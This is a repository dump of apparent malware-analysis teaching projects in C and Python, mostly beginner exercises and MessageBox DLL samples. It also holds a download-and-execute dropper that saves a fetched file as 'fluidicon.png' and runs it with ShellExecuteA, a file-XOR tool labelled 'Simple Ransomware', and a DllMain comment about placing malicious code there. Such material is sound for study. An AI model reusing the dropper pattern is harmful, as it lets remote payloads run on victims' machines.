18 | GetCurrentDirectoryA(MAX_PATH, filePath);
19 |
20 | // Format path to save downloaded file
21 | wsprintfA(filePath, TEXT("%s\\fluidicon.png"), filePath);
22 |
23 | // Download file from url
24 | HRESULT hRes = URLDownloadToFileA(NULL, url, filePath, 0, NULL);
25 | Sleep(400);
26 |
27 | // Print result
28 | if (hRes == S_OK) {
29 | printf(" [+] File download successfully.\n");
30 | Sleep(400);
31 | printf(" [+] Saved to: %s\n", filePath);
32 | Sleep(400);
33 | printf(" [+] Executing file dropped..!");
34 | Sleep(400);
35 | ShellExecuteA(NULL, "open", filePath, NULL, NULL, 1);
36 | } else if (hRes == E_OUTOFMEMORY) {
37 | printf(" [-] The buffer length is invalid.\n");
38 | } else if (hRes == INET_E_DOWNLOAD_FAILURE) {
39 | printf(" [-] The specified resource or callback interface was invalid.\n");
40 | } else {
41 | printf(" [-] Unknown Error!\n");
42 | }
43 |
44 | return 0;
45 | }
--------------------------------------------------------------------------------
/lma-poc/mingw/ex12_simple_dropper.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main()
5 | {
6 | return 0;
7 | }
--------------------------------------------------------------------------------
/lma-poc/mingw/simple_dll/main.cpp:
--------------------------------------------------------------------------------
1 | #include "main.h"
2 | #include
3 |
4 | void DLL_EXPORT FooFun0()
5 | {
6 | MessageBoxA(0, "No Args!", "FooFun0", MB_OK | MB_ICONINFORMATION);
7 | }
8 |
9 | void DLL_EXPORT FooFun1(char *first)
10 | {
11 | MessageBoxA(0, "One Args!", "FooFun1", MB_OK | MB_ICONINFORMATION);
12 | }
13 |
14 | void DLL_EXPORT FooFun2(int first, int last)
15 | {
16 | int a, b, c;
17 | a = 25;
18 | b = 75;
19 | c = a + b;
20 | char buff[100];
21 | sprintf(buff, "Three Args!\n%d + %d = %d", a, b, c);
22 | MessageBoxA(0, buff, "FooFun2", MB_OK | MB_ICONINFORMATION);
23 | }
24 |
25 | extern "C" DLL_EXPORT BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
26 | {
27 | int number1, number2, number3;
28 | number1 = 8;
29 | number2 = 2;
30 | number3 = number1 + number2;
31 | char buff[100];
32 | sprintf(buff, "DllMain Function\n%d + %d = %d", number1, number2, number3);
33 |
34 | MessageBoxA(0, buff, "DllMain", MB_OK | MB_ICONINFORMATION);
35 |
36 | switch (fdwReason)
37 | {
38 | case DLL_PROCESS_ATTACH:
39 | // attach to process
40 | // return FALSE to fail DLL load
41 | break;
42 |
43 | case DLL_PROCESS_DETACH:
44 | // detach from process
45 | break;
46 |
47 | case DLL_THREAD_ATTACH:
48 | // attach to thread
49 | break;
50 |
51 | case DLL_THREAD_DETACH:
52 | // detach from thread
53 | break;
54 | }
55 | return TRUE; // succesful
56 | }
57 |
--------------------------------------------------------------------------------
/lma-poc/mingw/simple_dll/main.h:
--------------------------------------------------------------------------------
1 | #ifndef __MAIN_H__
2 | #define __MAIN_H__
3 |
4 | #include
5 |
6 | /* To use this exported function of dll, include this header
7 | * in your project.
8 | */
9 |
10 | #ifdef BUILD_DLL
11 | #define DLL_EXPORT __declspec(dllexport)
12 | #else
13 | #define DLL_EXPORT __declspec(dllimport)
14 | #endif
15 |
16 |
17 | #ifdef __cplusplus
18 | extern "C"
19 | {
20 | #endif
21 |
22 | void DLL_EXPORT FooFun0();
23 | void DLL_EXPORT FooFun1(char *first);
24 | void DLL_EXPORT FooFun2(int first, int last);
25 |
26 | #ifdef __cplusplus
27 | }
28 | #endif
29 |
30 | #endif // __MAIN_H__
31 |
--------------------------------------------------------------------------------
/lma-poc/mingw/simple_dll/simple_dll.cbp:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
--------------------------------------------------------------------------------
/lma-poc/mingw/simple_dll/simple_dll.depend:
--------------------------------------------------------------------------------
1 | # depslib dependency file v1.0
2 | 1602573253 source:c:\users\hai\desktop\sample\lma_code\simple_dll\main.cpp
3 | "main.h"
4 |
5 |
6 | 1602573096 c:\users\hai\desktop\sample\lma_code\simple_dll\main.h
7 |
8 |
9 |
--------------------------------------------------------------------------------
/lma-poc/mingw/simple_dll/simple_dll.layout:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/lma-poc/mingw/xor_file.py:
--------------------------------------------------------------------------------
1 | # Use: ./xor.py file1 xor_key outfile
2 | # Example: ./xor.py C:\a.exe 6 C:\result.exe
3 |
4 | import sys
5 |
6 | # Read files as byte arrays
7 | file_bin = bytearray(open(sys.argv[1], 'rb').read())
8 | xor_key = int(sys.argv[2])
9 | file_enc = sys.argv[3]
10 |
11 | # Set the length to be the smaller one
12 | size = len(file_bin)
13 | payload_encoded = bytearray(size)
14 |
15 | # XOR Encode
16 | for i in range(size):
17 | payload_encoded[i] = file_bin[i] ^ xor_key
18 |
19 | # Write the XORd bytes to the output file
20 | open(file_enc, 'wb').write(payload_encoded)
21 |
22 | print("[*] {0} XOR {1}\n[*] Saved to {2}".format(sys.argv[1], xor_key, file_enc))
23 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex01_MessageBox/Ex01_MessageBox.c:
--------------------------------------------------------------------------------
1 | #include
2 | #pragma comment(linker, "/SUBSYSTEM:windows /ENTRY:mainCRTStartup")
3 |
4 | /*
5 | * Ref:
6 | * 1. https://stackoverflow.com/a/6882500
7 | * 2. https://stackoverflow.com/a/12413270
8 | */
9 | int main() {
10 | //FreeConsole(); // For hide console windows.
11 | MessageBoxA(NULL, "Hello, World!", "Hi!", MB_OK | MB_ICONINFORMATION);
12 | return 0;
13 | }
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex01_MessageBox/Ex01_MessageBox.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex01_MessageBox/Ex01_MessageBox.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex02_PrintString/Ex02_PrintString.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex02_PrintString/Ex02_PrintString.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex02_PrintString/Ex02_Print_String.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main() {
5 | char *str1 = "Lorem Ipsum ";
6 | char *str2 = "is simply dummy text.";
7 | printf("%s", str1);
8 | puts(str2);
9 |
10 | return 0;
11 | }
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex03_LocalVariable/Ex03_LocalVariable.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex03_LocalVariable/Ex03_LocalVariable.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex03_LocalVariable/Ex03_Local_Variable.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main()
5 | {
6 | unsigned int iYear = 2020;
7 | char *strCountry = "US";
8 | float flScrore = 8.5;
9 |
10 | printf(" [+] Next year = %d\n", iYear + 1);
11 | printf(" [+] Country = %s\n", strCountry);
12 | printf(" [+] Increment scrore = %.2f\n", flScrore + 1);
13 |
14 | return 0;
15 | }
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex04_GlobalVariable/Ex04_GlobalVariable.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex04_GlobalVariable/Ex04_GlobalVariable.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex04_GlobalVariable/Ex04_Global_Variable.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | unsigned int MAX_BUFFER = 255;
5 | #define MAX_SCORE 100
6 |
7 | int main()
8 | {
9 | char chr = 'A';
10 | float score = 95;
11 | static int level = 69;
12 | printf(" [+] All in one line: %d %d %c %.2f %d", MAX_BUFFER, MAX_SCORE, chr, score, level);
13 | return 0;
14 | }
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex05_Conditions/Ex05_Conditions.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main()
5 | {
6 | int x = 0;
7 | if (x == 0)
8 | {
9 | x = 5;
10 | }
11 | x = 2;
12 | return 0;
13 | }
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex05_Conditions/Ex05_Conditions.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex05_Conditions/Ex05_Conditions.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex06_x86_x64_Architecture/Ex06_x86_x64_Architecture.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main()
5 | {
6 | printf("%d %s %d %s %d %s %s %s", 1, "Two", 3, "FOUR", 555, "sIx!", "777", "eiGht-888");
7 | return 0;
8 | }
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex06_x86_x64_Architecture/Ex06_x86_x64_Architecture.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex06_x86_x64_Architecture/Ex06_x86_x64_Architecture.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex07_FileHandle/Ex07_FileHandle.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex07_FileHandle/Ex07_FileHandle.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex08_BufferClean/Ex08_BufferClean.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex08_BufferClean/Ex08_BufferClean.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex08_BufferClean/Ex08_Buffer_Clean.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #pragma warning(disable : 4996)
4 |
5 | int main()
6 | {
7 | char name[25], country[20];
8 | int age, c;
9 |
10 | printf("Name = ");
11 | gets(name);
12 |
13 | printf("Age = ");
14 | scanf("%d", &age);
15 |
16 | while ((c = getchar()) != '\n' && c != EOF) {}
17 |
18 | printf("Country = ");
19 | gets(country);
20 |
21 | printf("Name: %s, Country: %s, Age: %d\n", name, country, age);
22 |
23 | return 0;
24 | }
25 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex09_Function_Pointer/Ex09_Function_Pointer.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #pragma warning(disable : 4996)
4 |
5 | int Add(int a, int b) {
6 | return a + b;
7 | }
8 |
9 | int Mul(int a, int b) {
10 | return a * b;
11 | }
12 |
13 | int main()
14 | {
15 | typedef int(*ptrFunc)(int, int);
16 |
17 | printf("[ + ] Initialize local variable and function pointer!\n");
18 | ptrFunc ptrAdd = NULL, ptrMul = NULL;
19 | int x = 0, y = 0;
20 |
21 | printf("[ + ] Assigned Ptr.\n");
22 | ptrAdd = &Add;
23 | ptrMul = &Mul;
24 |
25 | printf("[ + ] Please input numer:\n");
26 | printf("number x = ");
27 | scanf("%d", &x);
28 | printf("number y = ");
29 | scanf("%d", &y);
30 |
31 | printf("%d + %d = %d\n", x, y, ptrAdd(x, y));
32 | printf("%d * %d = %d\n", x, y, ptrMul(x, y));
33 |
34 | return 0;
35 | }
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex09_Function_Pointer/Ex09_Function_Pointer.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex09_Function_Pointer/Ex09_Function_Pointer.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex10_Callback_Function/Ex10_Callback_Function.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #pragma warning(disable : 4996)
4 |
5 | int Add(int a, int b) {
6 | return a + b;
7 | }
8 |
9 | int Mul(int a, int b) {
10 | return a * b;
11 | }
12 |
13 | typedef int(*Calculator)(int, int);
14 |
15 | int superCalculator(int a, int b, Calculator ptrCalFunc) {
16 | return ptrCalFunc(a, b);
17 | }
18 |
19 | int main()
20 | {
21 | printf("[ + ] Local variable Initialized.\n");
22 | int x = 0, y = 0;
23 |
24 | printf("[ + ] Please input numer:\n");
25 | printf("number x = ");
26 | scanf("%d", &x);
27 | printf("number y = ");
28 | scanf("%d", &y);
29 |
30 | printf("%d + %d = %d\n", x, y, superCalculator(x, y, Add));
31 | printf("%d * %d = %d\n", x, y, superCalculator(x, y, Mul));
32 |
33 | return 0;
34 | }
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex10_Callback_Function/Ex10_Callback_Function.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex10_Callback_Function/Ex10_Callback_Function.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex11_Simple_Ransomware/Ex11_Simple_Ransomware.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #pragma warning(disable : 4996)
5 |
6 | /*
7 | ** Name : SFET - Simple File Encryption Tool
8 | ** Version : v0.1 - Beta version
9 | ** Crypto Algorithm support: XOR (AES, RSA, Hashing,.v.v.. is comming)
10 | */
11 |
12 | void printf_usage(char *str)
13 | {
14 | printf(" [+] Usage: %s \n", str);
15 | }
16 |
17 | int isValidXorKey(const char *key)
18 | {
19 | // xor key must be a numberic
20 | int len = strlen(key);
21 | for (int i = 0; i < len; i++)
22 | if (key[i] < '0' || key[i] > '9')
23 | return 0;
24 | return 1;
25 | }
26 |
27 | unsigned long long getSizeOfFile(char *filename)
28 | {
29 | FILE *fptr = NULL;
30 | unsigned long long sizeOfFile = 0;
31 | if ((fptr = fopen(filename, "rb")) == NULL) {
32 | printf(" [-] Error! Opening file \'%s\' for calculating size.\n", filename); exit(2);
33 | }
34 |
35 | fseek(fptr, 0L, SEEK_END);
36 | sizeOfFile = ftell(fptr);
37 | fclose(fptr);
38 | return sizeOfFile;
39 | }
40 |
41 | void readFileBinary(char *buffer, char *filename, unsigned long long filesize)
42 | {
43 | FILE *fptr = NULL;
44 | unsigned long long numberOfBytes = 0;
45 |
46 | if ((fptr = fopen(filename, "rb")) == NULL) {
47 | printf(" [-] Error! Opening file \'%s\' for reading.\n", filename); exit(2);
48 | }
49 |
50 | numberOfBytes = fread(buffer, 1, filesize, fptr);
51 | if (numberOfBytes != filesize) {
52 | printf(" [-] Error! Reading file\n"); exit(3);
53 | }
54 |
55 | fclose(fptr);
56 | }
57 |
58 | void writeFileBinary(char *buffer, char *filename, unsigned long long filesize)
59 | {
60 | FILE *fptr = NULL;
61 | unsigned long long numberOfBytes = 0;
62 |
63 | if ((fptr = fopen(filename, "wb")) == NULL) {
64 | printf(" [-] Error! Opening file \'%s\' for writing.\n", filename); exit(2);
65 | }
66 |
67 | numberOfBytes = fwrite(buffer, 1, filesize, fptr);
68 | if (numberOfBytes != filesize) {
69 | printf(" [-] Error! Writing file\n"); exit(4);
70 | }
71 |
72 | fclose(fptr);
73 | }
74 |
75 | void bufferEncoding(char *buffer, int xorKey, unsigned long long filesize)
76 | {
77 | unsigned long long i;
78 | for (i = 0; i < filesize; i++)
79 | buffer[i] ^= xorKey;
80 | }
81 |
82 | int main(int argc, char const *argv[])
83 | {
84 | // Get program name
85 | char progName[50];
86 | char *lastToken = strrchr(argv[0], '\\');
87 |
88 | if (lastToken != NULL) strcpy(progName, lastToken + 1);
89 | else strcpy(progName, argv[0]);
90 |
91 | // Check arguments
92 | if (argc != 4) {
93 | printf_usage(progName); exit(5);
94 | }
95 |
96 | char fileIn[50], fileOut[50];
97 | int xorKey = 0;
98 |
99 | // Parsing arguments
100 | strcpy(fileIn, argv[1]);
101 | if (isValidXorKey(argv[2])) {
102 | xorKey = atoi(argv[2]);
103 | } else {
104 | printf(" [-] Error! Invalid key. The encrypt key must be numberic!\n"); exit(5);
105 | }
106 | strcpy(fileOut, argv[3]);
107 |
108 | char *buffer = NULL;
109 | unsigned long long sizeOfFile = 0;
110 |
111 | // Obtain file size
112 | sizeOfFile = getSizeOfFile(fileIn);
113 |
114 | // Allocate memory to contain the whole file
115 | buffer = (char *)malloc(sizeOfFile * sizeof(char));
116 | if (buffer == NULL) {
117 | printf(" [-] Error! Memory not allocated.\n"); exit(3);
118 | }
119 |
120 | // Reading file to buffer
121 | readFileBinary(buffer, fileIn, sizeOfFile);
122 |
123 | // Encoding payload
124 | bufferEncoding(buffer, xorKey, sizeOfFile);
125 |
126 | // Write buffer to new file
127 | writeFileBinary(buffer, fileOut, sizeOfFile);
128 |
129 | // Terminate
130 | free(buffer);
131 |
132 | return 0;
133 | }
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex11_Simple_Ransomware/Ex11_Simple_Ransomware.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex11_Simple_Ransomware/Ex11_Simple_Ransomware.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex12_1_Simple_DLL_No_Export/Ex12_1_Simple_DLL_No_Export.c:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | /*
4 | ** Visual Studio Configuration Precompiled Header
5 | ** Project > Properties > C/C++ > All Option > Precompiled Header > Not Using ...
6 | ** => Xóa hết các file header .h và các file phụ khác do Visual Studio sinh ra. Chỉ để dllmain.cpp hoặc dllmain.c
7 | */
8 |
9 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
10 | {
11 | if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
12 | MessageBoxA(0, "This is DllMain.", "Simple DLL", MB_OK | MB_ICONWARNING);
13 | }
14 |
15 | return TRUE;
16 | }
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex12_1_Simple_DLL_No_Export/Ex12_1_Simple_DLL_No_Export.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex12_1_Simple_DLL_No_Export/Ex12_1_Simple_DLL_No_Export.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex12_2_Simple_DLL_Func_Exported/Ex12_2_Simple_DLL_Func_Exported.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #pragma warning(disable : 4996)
5 |
6 | #define DllExport __declspec(dllexport)
7 |
8 |
9 | /*
10 | ** VS Project > Properties > C/C++ > All Option > Precompiled Header > Not Using ...
11 | ** VS Project > Properties > Linker > All Option > General Debug Info > No
12 | ** Xóa các header file do VS tự động tạo ra.
13 | ** Ref:
14 | ** 1. MSDN - dllexport, dllimport
15 | https://docs.microsoft.com/en-us/cpp/cpp/dllexport-dllimport
16 | */
17 |
18 | int sum(int a, int b) {
19 | return a + b;
20 | }
21 |
22 | int mul(int a, int b) {
23 | return a * b;
24 | }
25 |
26 | DllExport void func() {
27 | char buffer[50] = { 0 };
28 | int a = 11, b = 9;
29 |
30 | sprintf(buffer, "This is func() exported.\n%d * %d = %d", a, b, mul(a, b));
31 | MessageBoxA(0, buffer, "func", MB_OK | MB_ICONWARNING);
32 | }
33 |
34 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
35 | {
36 | if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
37 | // Implement malicious code in DllMain Function
38 | char buffer[50] = { 0 };
39 | int a = 10, b = 9;
40 |
41 | sprintf(buffer, "This is DllMain.\n%d + %d = %d", a, b, sum(a, b));
42 | MessageBoxA(0, buffer, "DllMain", MB_OK | MB_ICONWARNING);
43 | }
44 |
45 | return TRUE;
46 | }
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex12_2_Simple_DLL_Func_Exported/Ex12_2_Simple_DLL_Func_Exported.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex12_2_Simple_DLL_Func_Exported/Ex12_2_Simple_DLL_Func_Exported.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex13_Simple_Downloader/Ex13_Simple_Downloader.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #pragma comment(lib, "urlmon.lib")
6 |
7 | /*
8 | ** Ref:
9 | ** 1. MSDN
10 | ** https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/platform-apis/ms775123(v=vs.85)
11 | ** 2. Should I use URLDownloadToFile?
